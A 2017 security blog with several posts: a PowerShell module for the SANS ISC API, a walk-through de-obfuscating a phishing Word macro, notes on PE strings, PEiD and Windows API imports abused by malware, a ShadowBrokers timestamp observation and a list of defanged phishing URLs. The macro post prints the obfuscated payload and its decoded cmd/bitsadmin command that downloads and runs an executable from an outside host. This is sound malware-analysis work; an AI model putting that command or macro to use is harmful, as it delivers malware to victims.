Thursday, June 22, 2017

Powershell Module to query the SANS ISC API

I listened to a great #SansAtNight talk at #SANSMinneapolis about the @sans_isc by @johullrich and thought I'd try to help out a little with a stormcenter PS module.

The SANS ISC API Powershell module is at my GitHub site.

You can use it with commands like:

  Import-Module stormcenter
  Get-ISCInfocon
  Get-ISCHandler
  Get-ISCIp 192.192.192.192

and many more.

Under the hood it queries the SANS ISC API.





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0
  2. SANS ISC API Powershell Module


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this Word doc in an email.

VirusTotal link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained obfuscated macros; a partial example is below:

Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)

....


The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in the VBA and created a de-obfuscate function that reverses their VBA decoding routine.

Public Function deobfuscate(obfuscated_command)
  ' Turn every "." into "%%" and split on "%"; the empty tokens this creates are skipped below
  pass1 = Join(Split(obfuscated_command, "."), "%%")
  still_obfuscated_command = Split(Trim(pass1), "%")
  resultstr = ""
  For counter = 0 To UBound(still_obfuscated_command)
    If Len(still_obfuscated_command(counter)) > 0 Then
      ' Each number is shifted by 10 + 2 + 2 = 14 and then turned into a character
      rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
      rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
      ' Array/Join is the macro's roundabout way of appending one character
      converted_string = Array(resultstr, rotate_pass3)
      resultstr = Join(converted_string, "")
    End If
  Next
  deobfuscate = resultstr
End Function

Private Sub Document_Open()
  obfuscated_command = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
  actual_command = deobfuscate(obfuscated_command)
  ' Display the decoded command instead of executing it
  InputBox "malcode", "infosec", actual_command
End Sub


Which results in the malicious command being printed to a popup for me to view:

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"
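The same decoding in Python, as an added example that is not part of the original post. It reverses the macro's fixed shift of 14, and goes one step further than the VBA: when the constant is not yet known, it narrows the feasible shifts to those that keep every token inside printable ASCII and ranks them by keyword hits. The sample is the first ten tokens of the obfuscated string above; the keyword list is an assumption.

```python
# Constructed sample: the first ten tokens of the obfuscated string shown above.
SAMPLE = "85.95.86.32.87.106.87.18.33.85"

# Strings a decoded macro payload often contains; used only to rank candidate shifts (assumed list).
KEYWORDS = ("cmd", "exe", "http", "powershell", "bitsadmin", "%appdata%")


def decode(obfuscated, shift=14, sep="."):
    """Reverse the macro's scheme: chr(n + shift) for each token (the VBA adds 10 + 2 + 2)."""
    chars = []
    for tok in obfuscated.split(sep):
        tok = tok.strip()
        if tok:                      # skip empty tokens, like the Len() check in the VBA
            chars.append(chr(int(tok) + shift))
    return "".join(chars)


def candidate_shifts(obfuscated, sep="."):
    """Shifts that keep every token inside printable ASCII (0x20..0x7E)."""
    nums = [int(t) for t in obfuscated.split(sep) if t.strip()]
    lo = 0x20 - min(nums)            # the smallest token must land on a space or later
    hi = 0x7E - max(nums)            # the largest token must not pass '~'
    return list(range(lo, hi + 1))


def rank_shifts(obfuscated, sep="."):
    """Decode with each feasible shift and rank by keyword hits, best first.

    Returns a list of (hits, shift, text) tuples.
    """
    scored = []
    for s in candidate_shifts(obfuscated, sep):
        text = decode(obfuscated, s, sep)
        hits = sum(text.lower().count(k) for k in KEYWORDS)
        scored.append((hits, s, text))
    scored.sort(key=lambda t: (-t[0], t[1]))
    return scored


if __name__ == "__main__":
    for hits, shift, text in rank_shifts(SAMPLE)[:3]:
        print(f"shift={shift:+d} hits={hits} {text!r}")
```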








Random Strings XML notes

Random notes on running strings and finding XML.

If you see something like ...
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
     <requestedPrivileges>
      <requestedExecutionLevel level='asInvoker' uiAccess='false' />
     </requestedPrivileges>
    </security>
   </trustInfo>
</assembly>
It could be a Visual Basic manifest that specifies a requested execution level (the default is asInvoker); for example, it could instead request highestAvailable or requireAdministrator.
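To make that check repeatable, here is an added Python example (not from the original post) that pulls each manifest out of a strings dump and reports the requested execution level; the sample dump is constructed around the manifest quoted above, and the namespace list is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Namespaces a manifest may use for trustInfo (assumed list); the sample above uses asm.v3.
ASM_NS = ("urn:schemas-microsoft-com:asm.v1",
          "urn:schemas-microsoft-com:asm.v2",
          "urn:schemas-microsoft-com:asm.v3")
MANIFEST_RE = re.compile(r"<assembly\b.*?</assembly>", re.DOTALL)
ELEVATING = ("highestAvailable", "requireAdministrator")

# Constructed strings output: unrelated lines around the manifest quoted in the post.
SAMPLE_DUMP = """!This program cannot be run in DOS mode.
.text
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
     <requestedPrivileges>
      <requestedExecutionLevel level='asInvoker' uiAccess='false' />
     </requestedPrivileges>
    </security>
   </trustInfo>
</assembly>
MSVCRT.dll
"""


def requested_execution_level(manifest_xml):
    """Return (level, uiAccess) from a manifest; a missing element means the asInvoker default."""
    root = ET.fromstring(manifest_xml)
    for ns in ASM_NS:
        node = root.find(f".//{{{ns}}}requestedExecutionLevel")
        if node is not None:
            return node.get("level", "asInvoker"), node.get("uiAccess", "false")
    return "asInvoker", "false"


def scan_strings(dump):
    """Find each manifest in a strings dump and flag the ones that request elevation."""
    findings = []
    for match in MANIFEST_RE.finditer(dump):
        try:
            level, ui_access = requested_execution_level(match.group(0))
        except ET.ParseError:
            continue                      # truncated or mangled manifest; nothing to report
        findings.append({"level": level, "uiAccess": ui_access,
                         "elevates": level in ELEVATING})
    return findings
```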






Random PEiD notes

Random PEiD notes.

Packers
  ASProtect 2.1x SKE -> Alexey Solodovnikov =

Others
  Borland Delphi 6.0 - 7.0 =
  Microsoft Visual C++ 6.0 =
  Nothing found * =








Random Windows Executable Dependency Notes

Random Windows executable dependency notes, based on the Windows API reference.


ADVAPI32.dll = part of an advanced API services library supporting numerous APIs including many security and registry calls

    @ CreateServiceA = create a new windows service, can be used for persistence

    @ RegCreateKeyExA = create or open registry key, can be used for persistence

    @ RegSetValueExA = set registry value, can be used for persistence

    @ StartServiceA = start a windows service, can be used for persistence

AUTHZ.dll = responsible for component Authorization Framework for Windows systems

    @ AuthzInitializeContextFromSid = creates a user-mode client context from a user security identifier (SID)



COMCTL32.dll = module that contains common GUI components used by Windows applications

COMDLG32.dll = module that contains Common dialog boxes used by Windows applications, such as the standard Open File form

    @ GetOpenFileNameA = open file dialog box

    @ GetSaveFileNameA = save file dialog box



CRYPTBASE.dll = responsible for component Base cryptographic API DLL for Windows

GDI32.dll = library that implements the GDI subsystem, where primitive graphical operations are performed

IPHLPAPI.dll = module containing the functions used by the Windows IP Helper API

    @ GetAdaptersInfo = gets info on the network adapters of the system

    @ GetIfTable = enumerates physical interfaces on system



KERNEL32.dll = Windows operating system kernel

    @ CreateFileA = create an ASCII file, can be used to drop a file

    @ CreateMutexA = create a mutex (mutually exclusive object), can be used to avoid infecting the system more than once & to coordinate communications among multiple components

    @ CreateProcessA = create a process, can be used to execute a program

    @ CreateThread = create a process, can be used to generate child process

    @ ExpandEnvironmentStringsA = get an environment variable

    @ GetModuleFileNameA = gets the file name of a module/dll already loaded

    @ GetModuleHandleA = get an existing module/dll

    @ GetProcAddress = get address of an exported function

    @ GetSystemInfo = get info about the system

    @ LoadLibraryA = load a module/dll, can be used to inject into processes

    @ LoadLibraryW = load a module/dll, can be used to inject into processes

    @ VirtualAlloc = reserves memory in the calling process

    @ WinExec = same as CreateProcess but for 16bit compatibility, can be used to execute a program

    @ WriteFile = write to a file, can be used to drop a file



KERNELBASE.dll = system file of Windows Operating System, which serves various Windows applications and services, kinda like a second generation of kernel32.dll

MFC42.DLL = module that contains the Microsoft Foundation Classes (MFC) functions

    @ WNetAddConnection2W = makes a connection to a network resource and can redirect a local device to the network resource

    @ WNetGetConnection2W = retrieves the name of the network resource associated with a local device

    @ WNetUseConnection2W = makes a connection to a network resource. The function can redirect a local device to a network resource



MPR.DLL = module containing functions used to handle communication between the Windows operating system and the installed network providers

MSVCP60.dll = standard C library functions such as printf, memcpy, and cos

MSVCRT.DLL = the C standard library for the Visual C++ (MSVC) compiler

    @ fopen = open a file

    @ memmove = overwrite memory



NDDEAPI.DLL = Windows for Workgroups DDE (Dynamic Data Exchange) Share Interface, no longer supported

    @ NDdeShareEnumA = retrieves available shares



NETAPI32.DLL = module that contains the Windows NET API used by applications to access a Microsoft network

    @ NetLocalGroupAddMembers = adds an account to a group, can be used for persistence

    @ NetUserAdd = adds a new account, can be used for persistence



NTDSAPI.DLL = module that contains a set of COM interfaces used to access the capabilities of directory services from different network providers

    @ DsServerRegisterSpnA = registers or unregisters the service principal names (SPNs)



OLE32.dll = part of the object linking and embedding technology, or OLE

    @ CreateBindCtx = returns object with info about a particular COM linking moniker

OLEAUT32.dll = library used in Microsoft for OLE (Object linking and embedding) technologies; OLE Automation

PSAPI.dll = Process Status Helper file used by Windows to collate information and files about all your software & drivers on your PC

    @ EnumProcesses = Retrieves the process identifier for each process object in the system

    @ EnumProcessModules = Retrieves a handle for each module in the specified process



RPCRTREMOTE.dll = process which is responsible for component Remote RPC Extension for Windows

RSAENH.dll = module that implements the Microsoft enhanced cryptographic service provider (CSP)

    @ CPCreateHash = creates and initializes a new hash object

    @ CPDecrypt = Decrypt data



SHELL32.dll = Windows Shell API functions, which are used when opening web pages and files

    @ SHBrowseForFolderA = Displays a dialog box that enables the user to select a folder

    @ ShellExecuteA = performs an operation on a file like open, find, and explore



SHFOLDER.dll = contains functions regarding Windows special folders such as My Documents

    @ SHGetFolderPathA = can be used to return folder paths like user's AppData



SHLWAPI.dll = library which contains functions for UNC and URL paths, registry entries, and color settings

    @ SHDeleteKeyA = deletes a registry key and all descendants



URLMON.dll = module that contains functions used by Microsoft OLE (Object Linking and Embedding)

    @ URLDownloadToFileA = downloads bits from the Internet and saves them to a file, can be used to download a payload



USER32.dll = used for windowing and other interactive user program tasks

    @ CreateWindowExA = open a new window

    @ DrawIcon = draw an icon or cursor

    @ EnableWindow = enable mouse and keyboard input in a window

    @ PeekMessageA = looks at incoming message to a window

    @ PostMessageA = sends message to a window

    @ RegisterClassExA = registers a class in relation to a window

    @ SetFocus = sets focus on a window

    @ SetWindowsHookEx = popular way keyloggers receive keyboard inputs



USERENV.dll = module that contains application programming interface (API) functions to create and manage user profiles

    @ LoadUserProfileW = Loads the specified user's profile. The profile can be a local user profile or a roaming user profile



USP10.dll = module that contains a collection of application programming interface (API) functions that enable a text layout client to format complex scripts



VERSION.dll = module that contains application programming interface (API) functions used for Windows version checking



WININET.dll = module that contains Internet-related functions used by Windows applications

    @ InternetOpenA = Initializes an application's use of the WinINet functions

    @ InternetOpenUrlA = Opens a resource specified by a complete FTP or HTTP URL

    @ InternetReadFile = Reads data from a handle opened by the InternetOpenUrl, FtpOpenFile, or HttpOpenRequest

    @ FindNextUrlCacheEntryA = Retrieves the next entry in the Internet cache

    @ DeleteUrlCacheEntry = Removes the file from the cache



WINMM.dll = module for the Windows Multimedia API, which contains low-level audio and joystick functions



WS2_32.dll = Windows Sockets API used by most Internet and network applications to handle network connections

    @ WSAIoctl = controls the mode of a socket

    @ WSASocketA = creates a new socket



WSOCK32.dll = just a wrapper for the actual winsock ws2_32.dll, the Windows Sockets API

    @ gethostbyname = lookup ip of host

    @ send = send data thru socket

    @ socket = create a socket

    @ WSAStartup = initiates use of the Winsock DLL by a process








Tuesday, April 18, 2017

ShadowBrokers EquationGroup Compilation Timestamp Observation

I looked at the IOCs @GossiTheDog posted, looked each one up in VirusTotal, and dumped the compilation timestamps into a spreadsheet.

To step back a second, the Microsoft Windows compiler embeds the date and time at which the given .exe or .dll was compiled. Compilation time is a very useful characteristic of a Portable Executable file. Malware authors could zero it or change it to a random value, but I'm not sure there is any indication of that here. If the compilation timestamps are real, then there's an interesting observation in this dataset.
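An added Python example, not from the original post, that reads the TimeDateStamp straight out of the COFF header and applies the sanity check implied above (a zeroed or future-dated stamp should not go into a timeline). The tiny header blob built by make_minimal_pe is constructed for testing and is not a runnable executable.

```python
import struct
from datetime import datetime, timezone


def pe_timestamp(data):
    """Return the raw TimeDateStamp from the COFF header of a PE image (bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header follows the 4-byte signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def assess_timestamp(ts, now_ts=None):
    """Classify a compile timestamp as 'zeroed', 'future' or 'plausible'.

    Returns (verdict, ISO-8601 UTC string or None). now_ts is epoch seconds,
    defaulting to the current time.
    """
    if ts == 0:
        return "zeroed", None
    if now_ts is None:
        now_ts = int(datetime.now(timezone.utc).timestamp())
    when = datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()
    if ts > now_ts:
        return "future", when
    return "plausible", when


def make_minimal_pe(ts):
    """Constructed test blob: MZ stub, e_lfanew, PE signature and a COFF header with the given stamp."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)   # e_lfanew points right after the stub
    coff = struct.pack("<HHIIIHH", 0x14C, 1, ts, 0, 0, 0, 0)   # Machine=i386, 1 section
    return bytes(header) + b"PE\0\0" + coff


if __name__ == "__main__":
    blob = make_minimal_pe(1262304000)   # constructed stamp: 2010-01-01T00:00:00Z
    print(assess_timestamp(pe_timestamp(blob)))
```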

VirusTotal shows you this value, for example.
If you look closely, the files in the dump range from 11/2009 to 8/2013.
And if you throw it into a graph you see a possible timeline of exploit creation.
Just an observation.




Wednesday, April 12, 2017

Collection of Google Docs Phishes seen by @neonprimetime

Below is a timelined collection of DropBox phishes seen by @neonprimetime.

Seen Live on: 4/12/2017
Url: hxxp://drcherian.com/alert/GD/
Folder: alert/SD
Page: Default
Source: PhishTank.com
Meta Page Title: Google Docs
Meta Page Author: None
Post page(s): Default



Seen Live on: 4/12/2017
Url: hxxp://drcherian.com/kingssss/GD/
Folder: kingssss/SD
Page: Default
Source: PhishTank.com
Meta Page Title: Google Docs
Meta Page Author: None
Post page(s): Default




